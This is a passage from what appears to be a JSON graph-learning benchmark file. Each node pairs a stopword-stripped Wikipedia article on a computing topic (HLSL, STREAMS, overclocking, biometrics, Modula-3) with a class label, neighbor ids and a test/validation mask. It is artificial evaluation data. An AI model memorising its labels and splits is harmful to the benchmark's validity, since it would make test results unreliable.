forums compuserve autosig free unlike wincim tapcis navcis ozcis/ozwin",
    "neighbors": [
      1664,
      641,
      6657,
      3971,
      11269,
      7943,
      8584,
      9736,
      4490,
      9993,
      1804,
      6028,
      1178,
      667,
      6171,
      8092,
      8474,
      8732,
      8735,
      7713,
      8987,
      9757,
      10142,
      10910,
      10791,
      3884,
      10668,
      9137,
      9908,
      4661,
      3639,
      4921,
      314,
      9019,
      5054,
      3137,
      835,
      11075,
      10057,
      1099,
      8524,
      7885,
      7630,
      9166,
      2261,
      4310,
      2519,
      5078,
      2777,
      6231,
      1883,
      8281,
      11099,
      3168,
      3425,
      5472,
      5858,
      8695,
      9825,
      4326,
      488,
      8169,
      7019,
      4844,
      8557,
      494,
      2670,
      8443,
      6133,
      119,
      4728,
      505,
      3323,
      637,
      8446,
      639
    ],
    "mask": "Test"
  },
  {
    "node_id": 4332,
    "label": 2,
    "text": "High-Level_Shading_Language:high-level shading language high-level shader language high-level shading language hlsl proprietary shading language developed microsoft direct3d 9 api augment shader assembly language went become required shading language unified shader model direct3d 10 higher hlsl analogous glsl shading language used opengl standard similar nvidia cg shading language developed alongside hlsl shaders enable profound speed detail increases well many special effects 2d 3d computer graphics hlsl programs come six forms pixel shaders fragment glsl vertex shaders geometry shaders compute shaders tessellation shaders hull domain shaders raytracing shaders ray generation shaders intersection shaders hit/closest hit/miss shaders vertex shader executed vertex submitted application primarily responsible transforming vertex object space view space generating texture coordinates calculating lighting coefficients vertex tangent binormal normal vectors group vertices normally 3 form triangle come vertex shader output position interpolated form pixels within area process known rasterization pixels comes pixel shader whereby resultant screen colour calculated optionally application using direct3d 10/11/12 interface direct3d 10/11/12 hardware may also specify geometry shader shader takes input vertices primitive triangle/line/point uses data generate/degenerate tessellate additional primitives change type primitives sent rasterizer d3d11.3 d3d12 introduced shader model 5.1 later 6.0 gpus listed hardware first supported given specifications manufacturers generally support lower shader models drivers note games may claim require certain directx version n't necessarily require gpu confirming full specification version developers use higher directx api version target lower-direct3d-spec hardware instance directx 9 exposes features directx7-level hardware directx7 targeting fixed-function l pipeline 32 64 executed instructions means 32 texture instructions 64 arithmetic instructions",
    "neighbors": [
      8514,
      936,
      7978,
      876,
      9741,
      6032,
      8438,
      11130,
      2943
    ],
    "mask": "Test"
  },
  {
    "node_id": 4333,
    "label": 2,
    "text": "STREAMS:streams computer networking streams native framework unix system v implementing character device drivers network protocols inter-process communication framework stream chain coroutines pass messages program device driver pair programs streams originated version 8 research unix streams capitalized streams design modular architecture implementing full-duplex i/o kernel device drivers frequent uses developing terminal i/o line discipline networking subsystems system v release 4 entire terminal interface reimplemented using streams important concept streams ability push drivers custom code modules modify functionality network interface device together form stack several drivers chained together order streams based streams i/o subsystem introduced eighth edition research unix v8 dennis ritchie used terminal i/o subsystem internet protocol suite version yet called streams capitals fit new functionality existing device i/o system calls open close read write ioctl application limited terminal i/o protocols providing pipe-like i/o semantics i/o system ported system v release 3 robert israel gil mcgrath dave olander her-daw che maury bach part wider framework intended support variety transport protocols including tcp iso class 4 transport sna lu 6.2 npack protocol used rfs first released network support utilities nsu package unix system v release 3 port added putmsg getmsg poll system calls nearly equivalent purpose send recv select calls berkeley sockets putmsg getmsg system calls originally called send recv renamed avoid namespace conflict system v release 4 streams extended used terminal i/o framework pipes providing useful new functionality like bidirectional pipes file descriptor passing port unicos also produced eric s. raymond quotes ritchie saying complexity system v streams compared v8 streams streams means something different shouted concurrent system v release 3 port developed protocol-independent streams message passing guidelines link network transport layers osi model layers 2-4 due typically close implementation coupling network transport protocols given protocol stack typical practice implementing layers 5-7 outside kernel link transport layer streams service interfaces later standardized x/open conjunction transport message passing model transport layer interface later adopted x/open transport interface defined provide transport protocol-independent api application development also library supporting session presentation application layers defined later standardized open group streams required conformance single unix specification versions 1 unix 95 2 unix 98 result refusal bsd linux developers provide streams marked optional posix compliance austin group version 3 unix 03 posix.1-2008 tc1 ieee std 1003.1 2013 edition designated streams 'marked obsolescent meaning said functionality may removed future version specification however specific definition 'obsolescent used also says strictly conforming posix applications 'shall use obsolescent features version 7 unix command connected terminal keyboard screen keyboard printer mechanism called line discipline would buffer single line input i.e. wait user press return key sending input program processing allowed simple error correction streams replaced set processing modules organized linear chain allowed bidirectional communication neighboring modules programs could push new module onto one end chain change behavior terminal character device ritchie gives example chain terminal module chained datakit network module achieve remote login network aside characters bytes going program device vice versa streams could carry control messages hangup drop connection ioctl messages streams could also used inter-process communication connecting two processes pseudoterminals possibility mpx window system blit graphics terminal could display multiple terminal emulator windows window process communicated window system pseudoterminal line discipline driver installed sending typed characters receiving text graphics display control signals designated user wish switch windows close actual streams modules live kernel space unix installed pushed removed popped ioctl system call example install aforementioned line discipline file descriptor codice_1 referring terminal device one would write c perform input/output stream one either uses codice_2 codice_3 system calls regular file descriptors set streams-specific functions send control messages ritchie admitted regretting implement streams kernel rather processes felt compelled reasons efficiency later plan 9 implementation implement modules user-level processes streams mostly used system v unix world however implementations exist linux include streams functionality without third-party add-ons caldera pushed streams included linux ca 1998 support netware linux rejected outright linux kernel developers technical grounds mainly performance compatibility layers linux operating systems convert streams operations sockets early possible implementation used caldera lis company called gcom later figured legal battles caldera successor sco group linux sco claiming linux streams infringed believed copyrights system v",
    "neighbors": [
      8975,
      8976,
      10005,
      7319,
      5531,
      6813,
      7204,
      5029,
      2995,
      5815,
      823,
      9151,
      576,
      7872,
      10436,
      2521,
      8414,
      6624,
      6369,
      9444,
      5864,
      636,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 4334,
    "label": 3,
    "text": "Overclocking:overclocking computing overclocking practice increasing clock rate computer exceed certified manufacturer commonly operating voltage also increased maintain component operational stability accelerated speeds semiconductor devices operated higher frequencies voltages increase power consumption heat overclocked device may unreliable fail completely additional heat load removed power delivery components meet increased power demands many device warranties state overclocking and/or over-specification voids warranty purpose overclocking increase operating speed given component normally modern systems target overclocking increasing performance major chip subsystem main processor graphics controller components system memory ram system buses generally motherboard commonly involved trade-offs increase power consumption heat fan noise cooling targeted components components designed margin safety deal operating conditions outside manufacturer control examples ambient temperature fluctuations operating voltage overclocking techniques general aim trade safety margin setting device run higher end margin understanding temperature voltage must strictly monitored controlled user examples operating temperature would need strictly controlled increased cooling part less tolerant increased temperatures higher speeds also base operating voltage may increased compensate unexpected voltage drops strengthen signalling timing signals low-voltage excursions likely cause malfunctions higher operating speeds modern devices fairly tolerant overclocking devices finite limits generally given voltage parts maximum stable speed still operate correctly past speed device starts giving incorrect results cause malfunctions sporadic behavior system depending pc context usual result system crash subtle errors go undetected long enough time give unpleasant surprises data corruption incorrectly calculated results worse writing storage incorrectly system failing certain specific tasks general usage internet browsing word processing appear fine application wanting advanced graphics crashes system point increase operating voltage part may allow headroom increases clock speed increased voltage also significantly increase heat output point limit imposed ability supply device sufficient power user ability cool part device maximum voltage tolerance achieves destructive failure overzealous use voltage and/or inadequate cooling rapidly degrade device performance point failure extreme cases outright destroy speed gained overclocking depends largely upon applications workloads run system components overclocked user benchmarks different purposes published conversely primary goal underclocking reduce power consumption resultant heat generation device trade-offs lower clock speeds reductions performance reducing cooling requirements needed keep hardware given operational temperature knock-on benefits lowering number speed fans allow quieter operation mobile devices increase length battery life per charge manufacturers underclock components battery-powered equipment improve battery life implement systems detect device operating battery power reduce clock frequency accordingly underclocking almost always involved latter stages undervolting seeks find highest clock speed processor stably operate given voltage overclocking seeks maximize clock speed temperature power constraints underclocking seeks find highest clock speed device reliably operate fixed arbitrary power limit given device may operate correctly stock speed even undervolted case underclocking would employed reductions voltage finally destabilizes part point user would need determine last working voltage speed satisfactorily lowered power consumption needs – performance must sacrificed lower clock chosen underclock testing progressively lower voltages would continue point lower bound device fails function and/or supporting circuitry reliably communicate part underclocking undervolting would attempted desktop system operate silently home entertainment center potentially offering higher performance currently offered low-voltage processor offerings would use standard-voltage part attempt run lower voltages attempting keep desktop speeds meet acceptable performance/noise target build also attractive using standard voltage processor low voltage application avoided paying traditional price premium officially certified low voltage version however like overclocking guarantee success builder time researching given system/processor combinations especially time tedium performing many iterations stability testing need considered usefulness underclocking like overclocking determined processor offerings prices availability specific time build underclocking also sometimes used troubleshooting overclocking become accessible motherboard makers offering overclocking marketing feature mainstream product lines however practice embraced enthusiasts professional users overclocking carries risk reduced reliability accuracy damage data equipment additionally manufacturer warranties service agreements cover overclocked components incidental damages caused use overclocking still option increasing personal computing capacity thus workflow productivity professional users importance stability testing components thoroughly employing production environment overstated overclocking offers several draws overclocking enthusiasts overclocking allows testing components speeds currently offered manufacturer speeds officially offered specialized higher-priced versions product general trend computing industry new technologies tend debut high-end market first later trickle performance mainstream market high-end part differs increased clock speed enthusiast attempt overclock mainstream part simulate high-end offering give insight over-the-horizon technologies perform officially available mainstream market especially helpful users considering plan ahead purchase upgrade new feature officially released hobbyists enjoy building tuning hot-rodding systems competitive benchmarking competitions competing like-minded users high scores standardized computer benchmark suites others purchase low-cost model component given product line attempt overclock part match expensive model stock performance another approach overclocking older components attempt keep pace increasing system requirements extend useful service life older part least delay purchase new hardware solely performance reasons another rationale overclocking older equipment even overclocking stresses equipment point failure earlier little lost already depreciated would needed replaced case technically component uses timer clock synchronize internal operations overclocked efforts computer components however focus specific components processors a.k.a cpu video cards motherboard chip sets ram modern processors derive effective operating speeds multiplying base clock processor bus speed internal multiplier within processor cpu multiplier attain final speed computer processors generally overclocked manipulating cpu multiplier option available processor components also overclocked increasing base speed bus clock systems allow additional tuning clocks system clock influence bus clock speed multiplied processor allow finer adjustments final processor speed oem systems expose user adjustments needed change processor clock speed voltage precludes overclocking warranty support reasons processor installed different motherboard offering adjustments allow user change given component ultimately stop operating reliably past certain clock speed components generally show sort malfunctioning behavior indication compromised stability alerts user given speed stable always possibility component permanently fail without warning even voltages kept within pre-determined safe values maximum speed determined overclocking point first instability accepting last stable slower setting components guaranteed operate correctly rated values beyond different samples may different overclocking potential end-point given overclock determined parameters available cpu multipliers bus dividers voltages user ability manage thermal loads cooling techniques several factors individual devices semiconductor clock thermal tolerances interaction components rest system several things considered overclocking first ensure component supplied adequate power voltage sufficient operate new clock rate supplying power improper settings applying excessive voltage permanently damage component professional production environment overclocking likely used increase speed justifies cost expert support required possibly reduced reliability consequent effect maintenance contracts warranties higher power consumption faster speed required often cheaper costs considered buy faster hardware electronic circuits produce heat generated movement electric current clock frequencies digital circuits voltage applied increase heat generated components running higher performance levels also increases relationship clock frequencies thermal design power tdp linear however limit maximum frequency called wall overcome issue overclockers raise chip voltage increase overclocking potential voltage increases power consumption consequently heat generation significantly proportionally square voltage linear circuit example requires cooling avoid damaging hardware overheating addition digital circuits slow high temperatures due changes mosfet device characteristics conversely overclocker may decide decrease chip voltage overclocking process known undervolting reduce heat emissions performance remains optimal stock cooling systems designed amount power produced non-overclocked use overclocked circuits require cooling powerful fans larger heat sinks heat pipes water cooling mass shape material influence ability heatsink dissipate heat efficient heatsinks often made entirely copper high thermal conductivity expensive aluminium widely used good thermal characteristics though good copper significantly cheaper cheaper materials steel good thermal characteristics heat pipes used improve conductivity many heatsinks combine two materials achieve balance performance cost water cooling carries waste heat radiator thermoelectric cooling devices actually refrigerate using peltier effect help high thermal design power tdp processors made intel amd early twenty-first century thermoelectric cooling devices create temperature differences two plates running electric current plates method cooling highly effective generates significant heat elsewhere must carried away often convection-based heatsink water cooling system cooling methods forced convection phase transition cooling used refrigerators adapted computer use liquid nitrogen liquid helium dry ice used coolants extreme cases record-setting attempts one-off experiments rather cooling everyday system june 2006 ibm georgia institute technology jointly announced new record silicon-based chip clock rate rate transistor switched cpu clock rate 500 ghz done cooling chip using liquid helium cpu frequency world record 8.794 ghz november 2012 extreme methods generally impractical long term require refilling reservoirs vaporizing coolant condensation form chilled components moreover silicon-based junction gate field-effect transistors jfet degrade temperatures roughly eventually cease function freeze since silicon ceases semiconducting using extremely cold coolants may cause devices fail submersion cooling used cray-2 supercomputer involves sinking part computer system directly chilled liquid thermally conductive low electrical conductivity advantage technique condensation form components good submersion liquid fluorinert made 3m expensive another option mineral oil impurities water might cause conduct electricity overclocked component operates outside manufacturer recommended operating conditions may function incorrectly leading system instability another risk silent data corruption undetected errors failures might never correctly diagnosed may instead incorrectly attributed software bugs applications device drivers operating system overclocked use may permanently damage components enough cause misbehave even normal operating conditions without becoming totally unusable large-scale 2011 field study hardware faults causing system crash consumer pcs laptops showed four 20 times increase depending cpu manufacturer system crashes due cpu failure overclocked computers eight-month period general overclockers claim testing ensure overclocked system stable functioning correctly although software tools available testing hardware stability generally impossible private individual thoroughly test functionality processor achieving good fault coverage requires immense engineering effort even resources dedicated validation manufacturers faulty components even design faults always detected particular stress test verify functionality specific instruction sequence used combination data may detect faults operations example arithmetic operation may produce correct result incorrect flags flags checked error go undetected complicate matters process technologies silicon insulator soi devices display hysteresis—a circuit performance affected events past without carefully targeted tests possible particular sequence state changes work overclocked rates one situation another even voltage temperature often overclocked system passes stress tests experiences instabilities programs overclocking circles stress tests torture tests used check correct operation component workloads selected put high load component interest e.g graphically intensive application testing video cards different math-intensive applications testing general cpus popular stress tests include prime95 everest superpi occt aida64 linpack via linx intelburntest guis sisoftware sandra boinc intel thermal analysis tool memtest86 hope functional-correctness issues overclocked component show tests errors detected test component deemed stable since fault coverage important stability testing tests often run long periods time hours even days overclocked computer sometimes described using number hours stability program used prime 12 hours stable overclockability arises part due economics manufacturing processes cpus components many cases components manufactured process tested manufacture determine actual maximum ratings components marked rating chosen market needs semiconductor manufacturer manufacturing yield high higher-rated components required may produced manufacturer may mark sell higher-performing components lower-rated marketing reasons cases true maximum rating component may exceed even highest rated component sold many devices sold lower rating may behave ways higher-rated ones worst case operation higher rating may problematical notably higher clocks must always mean greater waste heat generation semiconductors set high must dump ground often cases means chief drawback overclocked part far heat dissipated maximums published manufacturer pentium architect bob colwell calls overclocking uncontrolled experiment better-than-worst-case system operation benchmarks used evaluate performance become kind sport users compete highest scores discussed stability functional correctness may compromised overclocking meaningful benchmark results depend correct execution benchmark benchmark scores may qualified stability correctness notes e.g overclocker may report score noting benchmark runs completion 1 5 times signs incorrect execution display corruption visible running benchmark widely used test stability prime95 built-in error checking fails computer unstable using benchmark scores may difficult judge difference overclocking makes overall performance computer example benchmarks test one aspect system memory bandwidth without taking consideration higher clock rates aspect improve system performance whole apart demanding applications video encoding high-demand databases scientific computing memory bandwidth typically bottleneck great increase memory bandwidth may unnoticeable user depending applications used benchmarks 3dmark attempt replicate game conditions commercial system builders component resellers sometimes overclock sell items higher profit margins seller makes money overclocking lower-priced components found operate correctly selling equipment prices appropriate higher-rated components equipment normally operate correctly practice may considered fraudulent buyer unaware overclocking sometimes offered legitimate service feature consumers manufacturer retailer tests overclocking capability processors memory video cards hardware products several video card manufactures offer factory-overclocked versions graphics accelerators complete warranty usually price intermediate standard product non-overclocked product higher performance speculated manufacturers implement overclocking prevention mechanisms cpu locking prevent users buying lower-priced items overclocking measures sometimes marketed consumer protection benefit often criticised buyers many motherboards sold advertised extensive facilities overclocking implemented hardware controlled bios settings cpu locking process permanently setting cpu clock multiplier amd cpus unlocked early editions model locked later editions nearly intel cpus locked recent models resistant unlocking prevent overclocking users amd ships unlocked cpus opteron fx ryzen black series line-up intel uses monikers extreme edition x-series intel usually one two extreme edition cpus market well x series k series cpus analogous amd black edition amd majority desktop range black edition users unlock cpus allow underclocking overclocking front side bus speed older cpus compatibility certain motherboards unlocking invalidates manufacturer warranty mistakes cripple destroy cpu locking chip clock multiplier necessarily prevent users overclocking speed front-side bus pci multiplier newer cpus still changed provide performance increase amd athlon athlon xp cpus generally unlocked connecting bridges jumper-like points top cpu conductive paint pencil lead cpu models determinable serial number require different procedures increasing front-side bus northbridge/pci clock overclock locked cpus throws many system frequencies whack since ram pci frequencies modified well one easiest ways unlock older amd athlon xp cpus called pin mod method possible unlock cpu without permanently modifying bridges user could simply put one wire new multiplier/vcore socket unlock cpu overclocking components noticeable benefit component critical path process bottleneck disk access speed internet connection limit speed process 20 increase processor speed unlikely noticed overclocking cpu benefit game limited speed graphics card graphics cards overclocked utilities achieve evga precision rivatuner amd overdrive amd cards msi afterburner zotac firestorm zotac cards peg link mode asus motherboards overclocking gpu often yield marked increase performance synthetic benchmarks usually reflected game performance sometimes possible see graphics card pushed beyond limits permanent damage done observing on-screen artifacts two discriminated warning bells widely understood green-flashing random triangles appearing screen usually correspond overheating problems gpu white flashing dots appearing randomly usually groups screen often mean card ram overheating common run one problems overclocking graphics cards symptoms time usually means card severely pushed beyond heat clock rate voltage limits seen overclocked indicate faulty card clock speed excessive without overheating artifacts different general rule usually core pushed hard black circles blobs appear screen overclocking video memory beyond limits usually results application entire operating system crashing reboot video settings reset standard values stored graphics card firmware maximum clock rate specific card known overclockers apply potentiometer graphics card manually adjust voltage invalidates warranty results much greater flexibility overclocking software graphics cards rarely able adjust voltage excessive voltage increases may destroy graphics card flashing unlocking used improve performance video card without technically overclocking flashing refers using firmware different card core compatible firmware effectively making higher model card difficult may irreversible sometimes standalone software modify firmware files found e.g nibitor geforce 6/7 series well regarded aspect without using firmware better model video card example video cards 3d accelerators two voltage clock rate settings one 2d one 3d designed operate three voltage stages third somewhere aforementioned two serving fallback card overheats middle-stage going 2d 3d operation mode therefore could wise set middle-stage prior serious overclocking specifically fallback ability card drop clock rate reducing sometimes dozen depending setting percent efficiency cool without dropping 3d mode afterwards return desired high performance clock voltage settings cards abilities directly connected overclocking example nvidia geforce 6600gt agp flavor temperature monitor used internally card invisible user standard firmware used modifying firmware display 'temperature tab unlocking refers enabling extra pipelines pixel shaders 6800le 6800gs 6800 agp models first cards benefit unlocking models either 8 12 pipes enabled share 16x6 gpu core 6800gt ultra pipelines shaders beyond specified disabled gpu may fully functional may found faults affect operation lower specification gpus found fully functional unlocked successfully although possible sure undiscovered faults worst case card may become permanently unusable overclocked processors first became commercially available 1983 amd sold overclocked version intel 8088 cpu 1984 consumers overclocking ibm version intel 80286 cpu replacing clock crystal",
    "neighbors": [
      3586,
      3077,
      5637,
      7305,
      3210,
      6797,
      6549,
      4886,
      3352,
      11417,
      10139,
      1309,
      799,
      3615,
      4128,
      10658,
      10019,
      8102,
      10664,
      3882,
      3630,
      4270,
      1849,
      3140,
      966,
      1480,
      10440,
      8394,
      2383,
      7247,
      3281,
      2516,
      2901,
      10966,
      10715,
      2525,
      8035,
      1000,
      8552,
      1515,
      1005,
      7151,
      1776,
      1137,
      3323
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4335,
    "label": 5,
    "text": "FX.25_Forward_Error_Correction:fx.25 forward error correction fx.25 protocol extension ax.25 link layer protocol fx.25 provides forward error correction fec capability maintaining legacy compatibility non-fec equipment fx.25 created stensat group 2005 presented technical paper 2006 tapr digital communications conference tucson az fx.25 intended complement ax.25 protocol replace provides encapsulation mechanism alter ax.25 data functionalities error correction capability introduced bottom layer 2 osi model ax.25 link layer protocol extensively used amateur radio communications packets validated 16-bit crc discarded one errors detected many cases space-to-earth telemetry packets broadcast unidirectionally back-channel may available request retransmission errored elements consequently ax.25 links inherently intolerant errors fx.25 protocol extension provides error correction wrapper around ax.25 packet allowing removal errors receiving end data fields carefully chosen allow reception ax.25 packet data within fx.25 frame non-fec decoder composite fx.25 entity called frame distinguishing ax.25 packet contained within fx.25 frame contains following elements preamble correlation tag ax.25 packet ax.25 packet start ax.25 packet body ax.25 packet frame check sequence fcs ax.25 packet end pad bit-to-byte alignment fec check symbols postamble fec codeblock contains elements except preamble correlation tag postamble three elements exist outside correction-space fec algorithm preamble postamble blocks variable length included account delays typically found radio links transmitter key stable operation receiver squelch latency etc correlation tag gold code contains inherent error tolerance necessary provide start frame marker without requiring dependency fec capability fec frame currently implements reed solomon error correction algorithms restricted performance improvement function ax.25 packet size combined noise characteristics transmission channel initial performance testing involved transmission 61 fx.25 frames interval 15 minutes 9 frames received without errors 19 frames received correctable errors 33 frames received uncorrectable errors 15 ax.25 packets 9/61 decodable without fec capability 46 ax.25 packets 9+19 /61 decodable fec capability",
    "neighbors": [
      1192,
      6152,
      2306
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4336,
    "label": 4,
    "text": "Joint_source_and_channel_coding:joint source channel coding information theory joint source–channel coding encoding redundant information source transmission noisy channel corresponding decoding using single code instead conventional steps source coding followed channel coding joint source–channel coding proposed implemented variety situations including speech videotransmission",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 4337,
    "label": 2,
    "text": "List_of_computers_running_CP/M:list computers running cp/m many microcomputer makes models could run version derivation cp/m disk operating system eight-bit computers running cp/m 80 built around intel 8080/8085 zilog z80 compatible cpu cp/m 86 ran intel 8086 8088 computers suitable cp/m delivered others needed hardware modifications memory expansion modification new boot roms addition floppy disk drive popular home computers using processors supported cp/m plug-in z80 compatible processors allowing use cp/m retaining base machine keyboard peripherals sometimes video display memory following alphabetical list computers running cp/m",
    "neighbors": [
      11008,
      10113,
      5384,
      6921,
      9998,
      3216,
      9363,
      2840,
      664,
      2201,
      2729,
      7849,
      11562,
      9006,
      178,
      4409,
      7999,
      4548,
      7495,
      10067,
      10083,
      5220,
      1776,
      2672,
      3056,
      9329,
      2933,
      4727,
      11513,
      6778,
      1919
    ],
    "mask": "None"
  },
  {
    "node_id": 4338,
    "label": 2,
    "text": "Bliss_(image):bliss image bliss default computer wallpaper microsoft windows xp operating system unedited photograph green hill blue sky clouds los carneros american viticultural area california wine country charles o'rear made photo 1996 microsoft bought rights 2000 former national geographic photographer charles o'rear resident nearby napa valley took photo film medium-format mamiya rz67 camera way visit girlfriend 1996 widely believed later image digitally manipulated even created software adobe photoshop o'rear says never sold corbis use stock photo several years later microsoft engineers chose digitized version image licensed o'rear next decade claimed viewed photograph world time january 1996 former national geographic photographer charles o'rear way home st. helena california napa valley north san francisco visit girlfriend daphne irwin later married city every friday afternoon working irwin book wine country particularly alert photo opportunity day since storm passed recent winter rains left area especially green driving along sonoma highway california state route 12 121 saw hill free vineyards normally covered area pulled years earlier following phylloxera infestation god grass perfect green sun clouds remembered thinking stopped somewhere near napa–sonoma county line pulled road set mamiya rz67 medium-format camera tripod choosing fujifilm velvia film often used among nature photographers known saturate colors o'rear credits combination camera film success image made difference think helped 'bliss photograph stand even said think shot 35 mm would nearly effect setting camera said possible clouds picture came everything changing quickly time took four shots got back truck according o'rear image digitally enhanced manipulated way since pertinent wine-country book o'rear made available corbis stock photo available use interested party willing pay appropriate licensing fee 2000 microsoft windows xp development team contacted o'rear corbis believes used instead larger competitor getty images also based seattle former company owned microsoft founder bill gates idea looking recalls looking image peaceful looking image tension microsoft said wanted license image use xp default wallpaper buy rights offered o'rear says second-largest payment ever made photographer single image however signed confidentiality agreement disclose exact amount reported low six figures o'rear needed send microsoft original film sign paperwork however couriers delivery services became aware value shipment declined since higher insurance would cover software company bought plane ticket seattle personally delivered offices idea going go said n't think engineers anybody microsoft idea would success microsoft gave photo name made key part marketing campaign xp although o'rear manipulated image way company admitted cropping original image slightly left order better fit desktop making greens stronger photographer estimates image seen billion computers worldwide based number copies xp sold since november 2006 goldin+senneby visited site sonoma valley bliss image taken re-photographing view full grapevines pictured work microsoft first shown exhibition paris yesterday gallery la vitrine april 2007 later exhibited 300m³ gothenburg o'rear concedes despite photographs took national geographic probably remembered bliss anybody age 15 rest life remember photograph said since origins image widely known several years xp release considerable speculation landscape guesses included locations france england switzerland north otago region new zealand southeastern washington dutch users believed photograph shot ireland county kerry since image named ireland dutch release software similarly image named alentejo portuguese version leading users speaking language believe taken eponymous region portugal users speculated image real location sky came separate image spliced together hill o'rear adamant microsoft minor alterations digitized version nothing darkroom contrasting adams monolith 2012 david clark british magazine amateur photographer commented bliss nowiki /nowiki aesthetic qualities critics might argue image bland lacks point interest supporters would say evocation bright clear day beautiful landscape subject wrote notes dreamlike quality created filtered sunlight hillside distinguishing image made microsoft choose image others asked although company never told o'rear anyone else clark thought could guess attractive easy eye n't detract items might screen contributing factors may also chosen unusually inviting image verdant landscape one promotes sense wellbeing desk-bound computer users",
    "neighbors": [
      200,
      7983
    ],
    "mask": "Test"
  },
  {
    "node_id": 4339,
    "label": 5,
    "text": "Network_allocation_vector:network allocation vector network allocation vector nav virtual carrier-sensing mechanism used wireless network protocols ieee 802.11 wi-fi ieee 802.16 wimax virtual carrier-sensing logical abstraction limits need physical carrier-sensing air interface order save power mac layer frame headers contain duration field specifies transmission time required frame time medium busy stations listening wireless medium read duration field set nav indicator station long must defer accessing medium nav may thought counter counts zero uniform rate counter zero virtual carrier-sensing indication medium idle nonzero indication busy medium shall determined busy station sta transmitting ieee 802.11 nav represents number microseconds sending sta intends hold medium busy maximum 32,767 microseconds sender sends request send receiver waits one sifs sending clear send sender wait one sifs sending data receiver wait sifs sending ack nav duration first sifs ending ack time medium considered busy wireless stations often battery-powered conserve power stations may enter power-saving mode station decrements nav counter becomes zero time awakened sense medium nav virtual carrier sensing mechanism prominent part csma/ca mac protocol used ieee 802.11 wlans nav used dcf pcf hcf",
    "neighbors": [
      5092,
      8708
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4340,
    "label": 4,
    "text": "Biometric_device:biometric device biometric device security identification authentication device devices use automated methods verifying recognising identity living person based physiological behavioral characteristic characteristics include fingerprints facial images iris voice recognition biometric devices used man long period time non-automated biometric devices used us since 500 bc seen babylonian business transactions recorded clay tablets included fingerprints automation biometric devices first seen 1960s federal bureau investigation fbi 1960s introduced indentimat started checking fingerprints maintain criminal records first systems measured shape hand length fingers although discontinued 1980s system set precedent future biometric devices characteristic human body used access information users according characteristics sub-divided groups biometrics used establish better accessible records hours employee work increase buddy punching case employees clocked coworkers fraudulently inflated work hours employers looked towards new technology like fingerprint recognition reduce fraud additionally employers also faced task proper collection data entry exit times biometric devices make largely foul proof reliable ways enabling collect data employees present enter biometric details unique demand air travel grows people travel modern day airports implement technology way long queues biometrics implemented airports enable quick recognition passengers hence lead lower volume people standing queue one example dubai international airport plans make immigration counters relic past implement iris move technology iom help seamless departures arrivals passengers airport fingerprint sensors found mobile devices fingerprint sensor used unlock device authorize actions like money file transfers example used prevent device used unauthorized person one highly recognised acceptable biometrics corporate surroundings verification taken one step capturing signature taking account many parameters revolving around like pressure applied signing speed hand movement angle made surface pen used make signature system also ability learn users signature styles vary user hence taking sample data system able increase accuracy iris recognition involves device scanning retina subject cross referencing data stored database one secure forms authentication fingerprints left behind surfaces iris prints extremely hard stolen iris recognition widely applied organisations dealing masses one aadhaar identification carried government india keep records population reason iris recognition makes use iris prints humans hardly evolve one lifetime extremely stable biometric spoofing method fooling biometric identification management system counterfeit mold presented front biometric scanner counterfeit mold emulates unique biometric attributes individual confuse system artifact real biological target gain access sensitive data/materials one high-profile case biometric spoofing came limelight found german defence minister ursula von der leyen fingerprint successfully replicated chaos computer club group used high quality camera lenses shot images 6 feet away used professional finger software mapped contours ministers thumbprint although progress made stop spoofing using principle pulse oximetry- liveliness test subject taken account measure blood oxygenation heart rate reduces attacks like ones mentioned although methods n't commercially applicable costs implementation high reduces real world application hence makes biometrics insecure methods commercially viable accuracy major issue biometric recognition passwords still extremely popular password static nature biometric data subject change one voice becoming heavier due puberty accident face could lead improper reading facial scan data testing voice recognition substitute pin-based systems barclays reported voice recognition system 95 percent accurate statistic means many customers voices might still recognised even correct uncertanity revolving around system could lead slower adoption biometric devices continuing reliance traditional password-based methods researchers targeting drawbacks present-day biometric devices developing reduce problems like biometric spoofing inaccurate intake data technologies developed are-",
    "neighbors": [
      651,
      2901,
      8735
    ],
    "mask": "Test"
  },
  {
    "node_id": 4341,
    "label": 9,
    "text": "Modula-3:modula-3 modula-3 programming language conceived successor upgraded version modula-2 known modula-2+ influential research circles influencing designs languages java c python adopted widely industry designed luca cardelli james donahue lucille glassman mick jordan olivetti software technology laboratory bill kalsow greg nelson digital equipment corporation dec systems research center src olivetti research center orc late 1980s modula-3 main features simplicity safety preserving power systems-programming language modula-3 aimed continue pascal tradition type safety introducing new constructs practical real-world programming particular modula-3 added support generic programming similar templates multithreading exception handling garbage collection object-oriented programming partial revelation explicit mark unsafe code design goal modula-3 language implements important features modern imperative languages quite basic forms thus allegedly dangerous complicating features multiple inheritance operator overloading omitted modula-3 project started november 1986 maurice wilkes wrote niklaus wirth ideas new version modula wilkes working dec prior point returned england joined olivetti research strategy board wirth already moved oberon problems wilkes team continuing development modula name language definition completed august 1988 updated version january 1989 compilers dec olivetti soon followed 3rd party implementations design heavily influenced work modula-2+ language use src acorn computers research center arc later orc olivetti bought acorn time language operating system dec firefly multiprocessor vax workstation written acorn compiler acorn c modula execution library camel arc arx operating system project arm based acorn archimedes range computers written revised modula-3 report states language influenced languages mesa cedar object pascal oberon euclid 1990s modula-3 gained considerable currency teaching language never widely adopted industrial use contributing may demise dec key modula-3 supporter especially ceased maintain effectively dec sold compaq 1998 case spite modula-3 simplicity power appears little demand procedural compiled language restricted implementation object-oriented programming time commercial compiler called cm3 maintained one chief implementors prior dec src hired dec sold compaq integrated development environment called reactor extensible java virtual machine licensed binary source formats buildable reactor offered critical mass inc. company ceased active operations 2000 gave sources products software solutions gmbh modula-3 taught universities mostly comparative programming language courses textbooks print essentially corporate supporter modula-3 software solutions gmbh inherited sources critical mass since made several releases cm3 system source binary form reactor ide open source released several years new name cm3-ide march 2002 also took repository another active modula-3 distribution pm3 maintained école polytechnique de montréal later continued work hm3 improved years later obsoleted common example language syntax hello world program programs modula-3 least module file also include interface file used clients access data module like languages modula-3 program must export main module either file named main.m3 file call codice_1 export main module module file names suggested actual module name compiler warn different conventions syntax include naming exported type interface codice_2 since types usually qualified full names type codice_2 inside module named foo named codice_4 aids readability another similar convention naming public object codice_5 oop examples first foremost compilation units either codice_6 implementation codice_7s one flavor another interface compilation unit beginning keyword codice_6 defines constants types variables exceptions procedures implementation module beginning keyword codice_7 provides actual code constants types variables needed implement interface 